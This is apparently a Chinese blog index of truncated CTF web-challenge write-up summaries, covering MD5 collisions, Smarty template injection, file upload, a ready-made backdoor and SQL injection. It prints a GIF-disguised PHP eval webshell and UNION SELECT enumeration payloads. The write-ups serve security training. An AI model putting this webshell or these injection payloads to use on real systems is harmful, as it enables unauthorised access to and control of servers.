摘要:
md5碰撞 强比较 1.抓包 2.发现传参被加密了,应该有一个base64,解码然后又得到一个base64编码,一串16进制,解码后得到555.png,可得传入文件名被进行了俩次base64加密和一次hex加密 3.尝试将index.php按照上面的加密传入,得到TmprMlpUWTBOalUzT0 阅读全文
摘要:
1.点flag显示了ip,可能和X-Forwarded-For有关系,再点上面的hint,提示 2.抓个包看看,加个X-Forwarded-For,可能有模板注入 3.ip改成,返回了49,语句被执行了,确实存在Smarty模板引擎注入(https://blog.csdn.net/qq_455212 阅读全文
摘要:
scandir() 函数 返回指定目录中的文件和目录的数组。 var_dump() 函数用于输出变量的相关信息。 var_dump() 函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构。 file_get_contents — 将整个文件读入一个字符 阅读全文
摘要:
简单的文件上传漏洞题目 题目要求上传图片那我们就考虑上传一个phtml文件,然后抓包改下上传文件的类型 将里面的内容改为一句话木马,为我们后面的蚁剑连接做准备 GIF89a <script language="php">eval($_POST['hhz']);</script> 上面的头是gif的文 阅读全文
摘要:
简单题 进入后看到一个菜刀还有一个eval($_POST["Syc"] 还有标题的白给的shell 应该是web的后门题目 应该直接直接用菜刀或者蚁剑连接后门即可 Syc就是后门 根目录中直接就能看到flag 阅读全文
摘要:
一道基础的SQL注入题目 笔记: 爆破数据库:union select 1,2,group_concat(column_name) from information_schema.schemata%23 爆破表名 :union select 1,2,group_concat(table_name) 阅读全文